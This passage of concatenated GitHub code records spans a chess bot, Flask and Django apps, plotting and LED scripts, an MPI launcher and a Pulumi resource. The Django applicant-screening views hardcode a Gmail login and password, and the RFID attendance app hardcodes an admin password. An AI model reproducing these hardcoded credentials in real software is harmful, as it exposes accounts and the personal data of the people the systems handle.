cordinates.getValues()\n\n\n\nwpa=cords[0]\nwpb=cords[1]\nwpc=cords[2]\nwpd=cords[3]\nwpe=cords[4]\nwpf=cords[5]\nwpg=cords[6]\nwph=cords[7]\nwra=cords[16]\nwnb=cords[26]\nwbc=cords[28]\nwq=cords[20]\nwk=cords[22]\nwbf=cords[29]\nwng=cords[27]\nwrh=cords[17]\n\nbpa=cords[8]\nbpb=cords[9]\nbpc=cords[10]\nbpd=cords[11]\nbpe=cords[12]\nbpf=cords[13]\nbpg=cords[14]\nbph=cords[15]\nbra=cords[18]\nbnb=cords[25]\nbbc=cords[30]\nbq=cords[21]\nbk=cords[23]\nbbf=cords[31]\nbng=cords[24]\nbrh=cords[19]\n\n\n\n\ndef LMFPGC(x,y):\n\t\n\tbl = Legalm.black_moves(wpa,wpb,wpc,wpd,wpe,wpf,wpg,wph,bpa,bpb,bpc,bpd,bpe,bpf,bpg,bph,wra,wrh,bra,brh,wq,bq,wk,bk,bng,bnb,wnb,wng,wbc,wbf,bbc,bbf)\n\twl = Legalm.white_moves(wpa,wpb,wpc,wpd,wpe,wpf,wpg,wph,bpa,bpb,bpc,bpd,bpe,bpf,bpg,bph,wra,wrh,bra,brh,wq,bq,wk,bk,bng,bnb,wnb,wng,wbc,wbf,bbc,bbf)\n\t\n\tcords = (x, y)\n\t\n\treturning = []\n\tfor i in range(len(wl)):\n\t\t\n\t\tif wl[i] == cords:\n\t\t\t\n\t\t\tif i % 2 == 0:\n\t\t\t\treturning.append(wl[i+1])\n\tfor i in range(len(bl)):\n\t\tif bl[i] == cords:\n\t\t\tif i % 2 == 0:\n\t\t\t\treturning.append(bl[i+1])\n\treturn(returning)\n\t\t\t\n\t\t\t\n\n\n\n\n","repo_name":"QuadraticStudios/Chess-bot","sub_path":"LMFPGC.py","file_name":"LMFPGC.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72271384487","text":"import torch\n\n\ndef exponent_assign_and_check(mod, exponent):\n if not isinstance(exponent, int):\n assert (\n exponent.numel() == 1\n ), \"Only support power which exponent is scalar\"\n if mod.exponent is None:\n mod.exponent = exponent\n else:\n assert mod.exponent == exponent, (\n f\"This Pow is only used for exponent {mod.exponent}, \"\n f\"but get {exponent}\"\n )\n\n\nclass Pow(torch.nn.Module):\n \"Module implementation of torch.pow\"\n\n def __init__(self):\n super(Pow, self).__init__()\n self.exponent = None\n\n def forward(self, data, exponent):\n exponent_assign_and_check(self, exponent)\n return 
torch.pow(data, exponent)\n","repo_name":"xingyun-xy/cap","sub_path":"changan_plugin_pytorch/nn/pow.py","file_name":"pow.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15755040758","text":"import random\nfrom flask import Flask, jsonify # flask 패키지에서 Flask class를 호출\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return 'Hi'\n\n@app.route('/pick_lotto') # @ - decorator 밑에 정의되어 있는 함수를 실행해라 라는 의미가 포함되어 있음.\ndef pick_lotto():\n numbers = random.sample(range(1, 46), 6)\n return jsonify(numbers)\n\n@app.route('/hi/') #variable routing\ndef hi(name):\n return (f'hi {name}!')\n\n@app.route('/dictionary/')\ndef dictionary(word):\n my_dict = {\n 'apple': '사과',\n 'banana': '바나나',\n 'melon': '멜론'\n }\n if word in my_dict:\n return f'{word}은(는) {my_dict[word]}!'\n else:\n return f'{word}은(는) 나만의 단어장에는 없는 단어입니다.'\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"Nenemttin/TIL","sub_path":"04_flask/first_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36758921214","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n# prepare data\r\ndef f(x, y):\r\n return x**2 + y**2 + x * y\r\n\r\nX, Y = np.mgrid[-3:3, -3:3]\r\n\r\nprint('X:\\n', X)\r\nprint()\r\nprint('Y:\\n', Y)\r\nprint()\r\n\r\nZ = f(X, Y)\r\nprint('Z:\\n', Z)\r\nprint()\r\n\r\nfig = plt.figure(figsize=(9, 4))\r\n\r\n# Create contour lines.\r\nax1 = fig.add_subplot(121)\r\nax1.set_title('contour')\r\ncontour = ax1.contourf(X, Y, Z)\r\nprint(type(contour)) # \r\n\r\n# Create a 3D graph.\r\nax2 = fig.add_subplot(122, projection='3d')\r\nax2.set_title('surface')\r\nax2.plot_surface(X, Y, Z)\r\n\r\nplt.show()","repo_name":"munezou/VsCodeProject","sub_path":"Python/Normal/matplotlib/matplotlib_contourf.py","file_name":"matplotlib_contourf.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74984587047","text":"import board\nimport neopixel\nimport time\nimport math\nimport random\nimport sys\n\nbpc = 8\nvpc = 2 ** bpc\nvpp = vpc - 1\nsemicol = 2 * vpp\ntotalcol = 3 * vpp\ncount = 300\nspeed = 300\ndirection = 1\nstart = 88\nend = 299\ndesiredLength = end - start + 1\ninc = len(sys.argv) - 4\n\npresets = {\"red\":[(255,0,0)],\"green\":[(0,255,0)],\"blue\":[(0,0,255)],\n \"magenta\":[(255,0,255)],\"yellow\":[(255,255,0)],\"cyan\":[(0,255,255)],\n \"purple\":[(95,0,255)],\"orange\":[(255,127,0)],\n \"vapor\":[(0,255,127),(0,127,255),(127,0,255),(255,0,255)],\n \"rainbow\":[(255,0,0),(255,255,0),(0,255,0),(0,255,255),(0,0,255),(255,0,255)],\"watermelon\":[(255,0,63),(0,255,63)]}\n\ndef colClamp(num,mini=0,maxi=255):\n return min(max(num,mini),maxi)\n\ncardinals = []\n\nfor i in range(4,inc + 4):\n if(sys.argv[i] in presets):\n for j in presets[sys.argv[i]]:\n cardinals.append(j)\n else:\n col = sys.argv[i].split(\",\")\n cardinals.append(tuple([int(x) for x in col]))\n\ninc = len(cardinals)\n\nif(sys.argv[1] == \"true\" and inc > 2):\n for i in range(inc - 2,0,-1):\n if(cardinals[i] in presets):\n for j in presets[cardinals[i]]:\n cardinals.append(j)\n else:\n cardinals.append(cardinals[i])\n inc = (inc * 2) - 2\n\nif(sys.argv[2] == \"full\"):\n lpg = round(desiredLength / inc)\nelif(sys.argv[2] == \"part\"):\n lpg = 
round(desiredLength / ((inc + 2) / 2))\nelif(sys.argv[2] == \"half\"):\n lpg = round(desiredLength / (((inc + 2) / 2) - 1))\nelse:\n lpg = round(desiredLength / (inc * float(sys.argv[2])))\nlpg = max(lpg,1)\n\nprint(cardinals)\n\nlength = lpg * inc\nwait = ((speed / length) - (speed / length * 0.1))\n\norder = neopixel.GRB\nbrightness = float(sys.argv[3])\nbright = round(1/brightness)\n\npixels = neopixel.NeoPixel(board.D21,count,brightness=0.5,auto_write=False)\n\ncolors = []\n\nfor i in range(inc):\n rInc = (cardinals[i][0] - cardinals[(i + 1) % inc][0]) / lpg\n gInc = (cardinals[i][1] - cardinals[(i + 1) % inc][1]) / lpg\n bInc = (cardinals[i][2] - cardinals[(i + 1) % inc][2]) / lpg\n\n for j in range(lpg):\n r = round(cardinals[i][0] - (rInc * j))\n g = round(cardinals[i][1] - (gInc * j))\n b = round(cardinals[i][2] - (bInc * j))\n\n colors.append((r,g,b))\n\nprint(colors)\n\nfor i in range(start):\n pixels[i] = (0,0,0)\n\nif direction > 0:\n rng = (0,length,1)\nelse:\n rng = (length-1,-1,-1)\nwhile True:\n for i in range(*rng):\n for j in range(start,end+1):\n k = round((j + i) % length)\n if(j % bright == 0):\n pixels[j] = colors[k]\n pixels.show()\n time.sleep(wait)\n","repo_name":"JacobHutch/LEDLights","sub_path":"gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12467252929","text":"import itertools\nimport os\n\nnCpusList = [1, 2, 4, 8, 16, 32, 64]\nsizesList = [512, 1024, 1536, 2048, 2560]\n\nos.system(\"mpixlC -o prog MPI.cpp\")\n\nfor nCpus in nCpusList:\n for size in sizesList:\n for v in range(3):\n fName = str(nCpus) + \"_\" + str(size) + \"_\" + str(v)\n\n if os.path.exists(fName + \".out\") or os.path.exists(fName + \".err\"):\n continue\n\n os.system(\"mpisubmit.pl -p \" + str(nCpus) + \" -w 00:15\" + \\\n \" -stdout \" + fName + \".out\" + \\\n \" -stderr \" + fName + \".err\" + \\\n \" prog -- \" + str(size))","repo_name":"popandopulogeo/ribbon_matrix_multiplication_CMC","sub_path":"MPI/launchPolus.py","file_name":"launchPolus.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38795130172","text":"from collections import Counter\n\n\ndef findSubstring(self, s, words):\n if not s or not words:\n return []\n # 所有给定子串的长度都一样\n one_word = len(words[0])\n # 所有子串长度的总和\n all_len = len(words) * one_word\n n = len(s)\n words = Counter(words)\n res = []\n for i in range(n - all_len + 1):\n tmp = s[i:i+all_len]\n c_tmp = []\n # 每次跳oneword长度\n for j in range(0, all_len, one_word):\n c_tmp.append(tmp[j:j+one_word])\n if Counter(c_tmp) == words:\n res.append(i)\n return res\n\n\ncolors = ['red', 'blue', 'red', 'green', 'blue', 'blue']\nc = Counter(colors)\nprint(dict(c))\nprint(c['blue'])\ndel c['red']\nprint(list(c.elements()))\nprint(c.most_common(3))\n# +-&|\n","repo_name":"saycmily/vtk-and-python","sub_path":"leecode/1-500/1-100/30-串联所有单词的子串.py","file_name":"30-串联所有单词的子串.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8770081890","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 20 13:08:40 2017\n\n@author: Atlas\n\"\"\"\n\ndef cipher(map_from, map_to, code):\n \"\"\" map_from, map_to: strings where each contain \n N unique lowercase letters. 
\n code: string (assume it only contains letters also in map_from)\n Returns a tuple of (key_code, decoded).\n key_code is a dictionary with N keys mapping str to str where \n each key is a letter in map_from at index i and the corresponding \n value is the letter in map_to at index i. \n decoded is a string that contains the decoded version \n of code using the key_code mapping. \"\"\"\n\n key_code = {}\n decoded = ''\n for i in range(len(map_from)):\n key_code[map_from[i]] = map_to[i]\n\n for letter in code:\n # decode with the key_code mapping itself; letters without a\n # mapping pass through unchanged\n decoded = decoded + key_code.get(letter, letter)\n return key_code, decoded\n\n\nprint(cipher(\"abcde\", \"dcbaf\", \"dab\"))\n#cipher(\"abcd\", \"dcba\", \"dab\") \n#returns (order of entries in dictionary may not be the same) \n#({'a':'d', 'b': 'c', 'd': 'a', 'c': 'b'}, 'adc')\n\n# This took 4/20 points","repo_name":"atlasbc/mit_6001x","sub_path":"final/cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"34825206752","text":"import socket, subprocess\n\nPORT = '8000'\n\ndef get_ip_address():\n '''Return IP address'''\n hostname = socket.gethostname()\n ip_address = socket.gethostbyname(hostname)\n return ip_address\n\n\ndef main():\n '''Run the dev server on this machine's LAN address'''\n subprocess.call(f'python manage.py runserver { get_ip_address() }:{ PORT }', shell=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"andre23arruda/event-qr-code","sub_path":"runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19418498002","text":"import numpy as np\nfrom inspect import isroutine\n\n\nclass GenericObject():\n def __init__(self, **kwargs):\n # super(GenericObject, self).__init__()\n self.__dict__.update(**kwargs)\n\n\nclass ObjPool():\n def __init__(self, obj, objInc=1, *args, **kwargs):\n self._args = args\n self._kwargs = kwargs\n self._obj = obj\n self._objList = []\n self._objInc = objInc\n\n self._incPool()\n\n def _incPool(self):\n # build objInc fresh instances; a comprehension is required so the\n # pool does not hold the same instance several times\n self._objList += [self._obj(*self._args, **self._kwargs) for _ in range(self._objInc)]\n\n def getObj(self):\n if len(self._objList) > 0:\n return self._objList.pop()\n else:\n self._incPool()\n return self._objList.pop()\n\n def releaseObj(self, obj):\n self._objList.append(obj)\n\n\n# returns the attributes, dropping protected ones\n# vars(o) ---> [n for n in vars(o)]\n# o.__dict__ ---> [n for n in o.__dict__]\ndef getAttribNames(o,\n showFunc='name',\n showNone=False,\n showPrivate=False,\n showRoutines=False,\n showMagicMethods=False):\n if showFunc == 'type':\n showf = lambda o, n: (n, type(getattr(o, n)).__name__)\n elif showFunc == 'val':\n showf = lambda o, n: (n, getattr(o, n))\n elif showFunc == 'valAndType':\n showf = lambda o, n: (n, getattr(o, n), type(getattr(o, n)).__name__)\n else:\n showf = lambda o, n: n\n\n condf = lambda o, n: not any(np.logical_or(\n [\n getattr(o, n) is None,\n n[0] == '_',\n isroutine(getattr(o, n)),\n n.startswith('__') and n.endswith('__')\n ], [\n showNone,\n showPrivate,\n showRoutines,\n showMagicMethods\n ]))\n\n return [showf(o, n) for n in dir(o) if condf(o, n)]\n\n\ndef isIterable(obj):\n 'Indicates whether the object is a list or a tuple'\n return isinstance(obj, list) or isinstance(obj, tuple)\n# return isinstance(obj, (list, 
tuple))\n\n\n\n\n","repo_name":"NCToader/DeepSpineTool","sub_path":"app/plugins/utils/image/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13903244802","text":"from django.shortcuts import render, redirect\nfrom .models import InterestForm, ExperienceForm, PhoneInterview\nimport smtplib\nimport math\nimport random\nfrom email.message import EmailMessage\nfrom django.views.generic import DetailView\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n# Create your views here.\n\n\ndef induction(request, pk):\n EMAIL_ADDRESS = 'tapapplication2020@gmail.com'\n EMAIL_PASSWORD = 'Testing321'\n acceptance_msg = EmailMessage()\n acceptance_msg['Subject'] = 'Accepted for induction'\n acceptance_msg['From'] = EMAIL_ADDRESS\n acceptance_msg['To'] = pk\n acceptance_msg.set_content(\"You are selected for the induction program.\")\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)\n smtp.send_message(acceptance_msg)\n messages.success(request, f'Sent induction email !')\n return redirect('phone-interview')\n\n\n@login_required\ndef phone_interview_detail(request, pk):\n if request.method == \"POST\":\n obj = PhoneInterview.objects.filter(email=pk).first()\n a = request.POST.get('1', '')\n a = int(a)\n if a >= 3:\n obj.accepted = True\n else:\n obj.accepted = False\n obj.grade = request.POST.get('1', '')\n obj.save()\n return redirect('phone-interview')\n return render(request, 'phone_interview_detail.html', context={'object': InterestForm.objects.filter(email=pk).first(), 'eobject': ExperienceForm.objects.filter(email=pk).first()})\n\n\n@login_required\ndef phone_interview(request):\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(shortlisted=True),\n 'interviews': PhoneInterview.objects.all()\n\n }\n if request.method == \"POST\":\n selected_interest = request.POST.get('property', \"\")\n selected_exp = request.POST.get('exp', \"\")\n if selected_interest != 'all':\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(interest__icontains=selected_interest),\n 'interviews': PhoneInterview.objects.all()\n }\n return render(request, 'phone_interview.html', context)\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(shortlisted=True),\n 'interviews': PhoneInterview.objects.all()\n }\n print(context)\n return render(request, 'phone_interview.html', context)\n\n\ndef interview_timing(request, pk):\n if request.method == \"POST\":\n time = request.POST.get('time', \"\")\n name = request.POST.get('name', \"\")\n obj = PhoneInterview(name=name, timing=time, email=pk)\n obj.save()\n return render(request, 'thankyou.html')\n\n return render(request, 'interview_timing.html', {'email': pk})\n\n\n@login_required\ndef shortlist_email(request):\n EMAIL_ADDRESS = 'tapapplication2020@gmail.com'\n EMAIL_PASSWORD = 'Testing321'\n expTrue = ExperienceForm.objects.filter(shortlisted=True)\n expFalse = ExperienceForm.objects.filter(shortlisted=False)\n true_mail = []\n false_mail = []\n for exp in expTrue:\n true_mail.append(exp.email)\n for exp in expFalse:\n false_mail.append(exp.email)\n\n for email in true_mail:\n acceptance_msg = EmailMessage()\n acceptance_msg['Subject'] = 'Accepted for phone interview'\n acceptance_msg['From'] = 
EMAIL_ADDRESS\n acceptance_msg['To'] = email\n acceptance_msg.set_content(\"Please enter phone interview timings:http://localhost:8000/interview/\" + email)\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)\n smtp.send_message(acceptance_msg)\n rejection_msg = EmailMessage()\n rejection_msg['Subject'] = 'Result of Shortlisting'\n rejection_msg['From'] = EMAIL_ADDRESS\n rejection_msg['To'] = false_mail\n rejection_msg.set_content(\"ThankYou for applying.Better luck next time.\")\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)\n smtp.send_message(rejection_msg)\n messages.success(request, f'Email Sent!')\n return redirect('shortlist')\n\n\n@login_required\ndef shortlist(request):\n print(\"hello\")\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(shortlisted=True),\n\n }\n if request.method == \"POST\":\n selected_interest = request.POST.get('property', \"\")\n selected_exp = request.POST.get('exp', \"\")\n if selected_interest != 'all':\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(interest__icontains=selected_interest),\n }\n return render(request, 'shortlist.html', context)\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(shortlisted=True),\n }\n print(context)\n return render(request, 'shortlist.html', context)\n\n\n@login_required\ndef dashboard(request):\n\n if request.method == \"POST\":\n selected_interest = request.POST.get('property', \"\")\n selected_exp = request.POST.get('exp', \"\")\n if selected_interest != 'all':\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(interest__icontains=selected_interest),\n }\n messages.success(request, f'Filter applied: {selected_interest}!')\n return render(request, 'index.html', context)\n\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.all()\n }\n\n return render(request, 'index.html', context)\n\n\ndef detailview(request, pk):\n if request.method == \"POST\":\n obj = ExperienceForm.objects.filter(email=pk).first()\n a = request.POST.get('1', '')\n print(a)\n a = int(a)\n if a >= 3:\n obj.shortlisted = True\n else:\n obj.shortlisted = False\n obj.grade = request.POST.get('1', '')\n obj.save()\n return redirect('dashboard')\n return render(request, 'detailview.html', context={'object': InterestForm.objects.filter(email=pk).first(), 'eobject': ExperienceForm.objects.filter(email=pk).first()})\n\n\n# def grade(request):\n# if request.method == \"POST\":\n\n\ndef home(request):\n\n return render(request, 'index.html')\n\n\ndef interest(request):\n EMAIL_ADDRESS = 'tapapplication2020@gmail.com'\n EMAIL_PASSWORD = 'Testing321'\n\n if request.method == \"POST\":\n string = \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n lent = len(string)\n otp = \"\"\n for i in range(15):\n otp += string[math.floor(random.random() * lent)]\n\n name = request.POST.get('name', \"\")\n email = request.POST.get('email', \"\")\n phno = request.POST.get('phno', '')\n city = request.POST.get('city', \"\").lower()\n pincode = request.POST.get('pincode', '')\n\n # email_body = \"\"\"
\n        # Congratulations! We've successfully created account.\n        # Go to the page: click here\n        # Thanks,\n        # XYZ Team.\n        # 
\"\"\"\n\n # msg = MIMEText(email_body ,'html')\n\n print(otp, city)\n if city == \"mumbai\" or city == \"pune\":\n msg = EmailMessage()\n msg['Subject'] = 'Approval for Form 2 submission'\n msg['From'] = EMAIL_ADDRESS\n msg['To'] = email\n msg.set_content('Secret Key: ' + otp + \"\\nThis key is confidential do not share\\nLink for Form 2:http://localhost:8000/experience/\")\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)\n smtp.send_message(msg)\n inst = InterestForm(name=name, phone_number=phno, email=email, city=city, secret_key=otp, pincode=pincode)\n inst.save()\n else:\n inst = InterestForm(name=name, phone_number=phno, email=email, city=city, pincode=pincode)\n inst.save()\n\n return render(request, 'adminusers/logout.html')\n\n return render(request, 'form1.html')\n\n\n# def sk_validation(request, sk):\n# render(request,)\n\n\ndef form2_post(request):\n if request.method == \"POST\":\n interest_list = request.POST.getlist('checkbox[]', '')\n email = request.POST.get('email', \"\")\n desc = request.POST.get('desc', \"\")\n print(interest_list, email)\n interest = \"\"\n experience = \"\"\n for i in range(len(interest_list)):\n interest += interest_list[i] + \" \"\n print(interest)\n for i in range(1, 8):\n experience = experience + \" \" + request.POST.get(\"exp\" + str(i))\n experience_form = ExperienceForm(email=email, interest=interest, experience=experience, description=desc)\n print(experience_form)\n experience_form.save()\n return render(request, 'failure.html')\n\n\ndef experience(request):\n\n if request.method == 'POST':\n sk = request.POST.get('sk', \"\")\n if len(InterestForm.objects.filter(secret_key=sk)) != 0:\n return render(request, 'form2.html', {'object': InterestForm.objects.filter(secret_key=sk).first()})\n else:\n return render(request, 'failure.html')\n\n return render(request, 'sk_validation.html')\n","repo_name":"shubhamshettyy/Tap-App","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72142713449","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"metaloader\",\n version=\"0.4.0\",\n author=\"Jacob Neil Taylor\",\n author_email=\"me@jacobtaylor.id.au\",\n description=\"A configurable pipeline for loading data files\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/jacobneiltaylor/metaloader\",\n package_dir={'': 'src'},\n packages=setuptools.find_packages(where='src'),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n install_requires=[\n \"ruamel.yaml\",\n \"plugable\"\n ],\n)\n","repo_name":"jacobneiltaylor/metaloader","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20275440540","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\n\nfrom PyQt5.QtWidgets import (\n QApplication, \n QLabel, \n QMainWindow)\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import QSize, Qt \nimport sys\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n \n 
self.setWindowTitle(\"My App\")\n \n widget = QLabel(\"Hello\")\n widget.setPixmap(QPixmap(\"otje.jpg\"))\n widget.setScaledContents(True)\n \n self.setCentralWidget(widget)\n \n \nif(__name__ == \"__main__\"):\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n \n app.exec_() ","repo_name":"Jemilianomr/Escuela","sub_path":"IVA/imagen.py","file_name":"imagen.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19737819789","text":"from pathlib import Path\nfrom typing import Any, Dict, Optional\n\nfrom pulumi import ResourceOptions\nfrom pulumi.dynamic import Resource\nfrom pulumi.dynamic.dynamic import CreateResult, DiffResult, ResourceProvider\n\nEXPORTS_FILE_NAME = \"aws-exports.js\"\n\n\nclass AmplifyExportsFile(Resource):\n \"\"\"\n Manages an Amplify-style JavaScript exports file, containing parameters for use\n by client code. By default this file will be called aws-exports.js.\n \"\"\"\n\n def __init__(\n self,\n name: str,\n source_directory: str,\n parameters: Dict,\n opts: Optional[ResourceOptions] = None,\n ):\n \"\"\"\n :param str source_directory: The path of the client source directory in\n which the exports file should be placed\n :param Dict parameters: The parameters which will appear in the\n JavaScript object\n \"\"\"\n\n super().__init__(\n AmplifyExportsFileProvider(),\n name,\n {\n \"exports_file_path\": str(\n Path(source_directory).joinpath(EXPORTS_FILE_NAME)\n ),\n \"parameters\": parameters,\n },\n opts,\n )\n\n\nclass AmplifyExportsFileProvider(ResourceProvider):\n \"\"\"\n The dynamic provider for the AmplifyExportsFile resource, which creates and\n deletes the file.\n \"\"\"\n\n def create(self, inputs: Dict[str, Any]) -> CreateResult:\n file_inputs = inputs[\"parameters\"]\n\n file_content = [\n \"/* eslint-disable */\",\n (\n \"// WARNING: DO NOT EDIT. This file is automatically generated by \"\n \"pulumi-amplify. 
It will be overwritten.\"\n ),\n \"\",\n \"const awsmobile = {\",\n *[f' \"{key}\": \"{file_inputs[key]}\",' for key in file_inputs.keys()],\n \"};\",\n \"\",\n \"\",\n \"export default awsmobile;\",\n ]\n exports_file_path = Path(inputs[\"exports_file_path\"])\n exports_file_path.write_text(\"\\n\".join(file_content))\n return CreateResult(\n exports_file_path.name, {\"exports_file_path\": inputs[\"exports_file_path\"]}\n )\n\n def diff(self, _id, olds, _news):\n return DiffResult(\n changes=True, replaces=olds.keys(), delete_before_replace=True\n )\n\n def delete(self, _id, props):\n Path(props[\"exports_file_path\"]).unlink()\n","repo_name":"cloudspeak/pulumi-amplify","sub_path":"pulumi_amplify/amplify_exports_file.py","file_name":"amplify_exports_file.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4498157409","text":"import os\nimport time\nimport logging\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ducatus_exchange.settings')\nimport django\n\ndjango.setup()\n\nfrom django.utils import timezone\nfrom ducatus_exchange.lottery.models import Lottery, LotteryPlayer\nfrom ducatus_exchange.settings import LOTTERY_CLOSING_INTERVAL, LOTTERY_CHECKER_INTERVAL\nfrom random_contract.executor import finalize_lottery\n\nlogger = logging.getLogger('lottery_checker')\n\nif __name__ == '__main__':\n\n while True:\n for lottery in Lottery.objects.filter(ended=False):\n if lottery.sent_duc_amount >= lottery.duc_amount and lottery.filled_at:\n if timezone.now().timestamp() - lottery.filled_at > LOTTERY_CLOSING_INTERVAL:\n winners = finalize_lottery(lottery.gave_tickets_amount)\n\n lottery.winner_numbers = winners\n winner_users = [None] * len(winners)\n\n tickets_amount = 0\n for lottery_player in LotteryPlayer.objects.order_by('id'):\n if not all(winner_users):\n prev_tickets_amount = tickets_amount\n tickets_amount += lottery_player.tickets_amount\n for i, winner_number in enumerate(winners):\n if prev_tickets_amount < winner_number <= tickets_amount:\n winner_users[i] = lottery_player.id\n else:\n break\n\n lottery.winner_players_ids = winner_users\n\n lottery.ended = True\n lottery.save()\n\n lottery.send_mails_to_winners()\n logger.info(msg=f'lottery {lottery.name} with id {lottery.id} closed')\n\n time.sleep(LOTTERY_CHECKER_INTERVAL)\n","repo_name":"MyWishPlatform/ducatus_exchange_backend","sub_path":"lottery_checker.py","file_name":"lottery_checker.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8211944509","text":"import json, os, sys\nfrom flask import Flask, flash, request, redirect, url_for\nimport requests\nfrom flask import jsonify\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\n\n#Configuration_login\nUserName = \"Terafast\"\nPwd = \"!changeme!\"\n\n@app.route(\"/\")\ndef index():\n return (\"Terafast RFID Test\")\n\n#@app.route(\"/login\")\ndef login():\n try:\n token = None\n login_url = \"http://controller:8080/auth/login?username=Admin@\"+UserName+\"&password=\"+Pwd\n headers = {}\n token = requests.get(login_url, headers=headers)\n if token.text is not None:\n token_dict= json.loads(token.text)\n if 'access-token' in token_dict:\n token = token_dict['access-token']\n except Exception as er:\n raise er \n\n return token\n\n@app.route(\"/attendance/status/<startdate>/<enddate>\")\ndef emp_status_report(startdate=None, enddate=None):\n try:\n token = login()\n headers = {\"Authorization\" 
: \"Bearer %s \" %token, \"Content-Type\":\"application/json\"}\n getstatus = \"http://controller:8080/attendance/status?startDate=\"+startdate+\" 00:00:00&endDate=\"+enddate+\" 23:59:59\"\n resp = requests.get(getstatus, headers = headers)\n\n except Exception as er:\n raise er\n\n return jsonify({\"status\" : resp.text})\n\n@app.route(\"/attendance/detailed/<startdate>/<enddate>/<uId>\")\ndef emp_detailed_report(startdate, enddate, uId):\n try:\n token = login()\n headers = {\"Authorization\" : \"Bearer %s \" %token, \"Content-Type\":\"application/json\"}\n empDetails = \"http://controller:8080/attendance/detailed?startDate=%s 00:00:00&endDate=%s 23:59:59&uId=%s\"%(startdate, \n enddate, uId)\n resp = requests.get(empDetails, headers = headers)\n\n except Exception as er:\n raise er\n\n return jsonify({\"detailedReport\" :resp.text})\n\n\n@app.route(\"/attendance/summary/<startdate>/<enddate>\")\ndef emp_summary_report(startdate, enddate):\n try:\n token = login()\n headers = {\"Authorization\" : \"Bearer %s \" %token, \"Content-Type\":\"application/json\"}\n getSummary = \"http://controller:8080/attendance/summary?startDate=\"+startdate+\" 00:00:00&endDate=\"+enddate+\" 23:59:59\"\n resp = requests.get(getSummary, 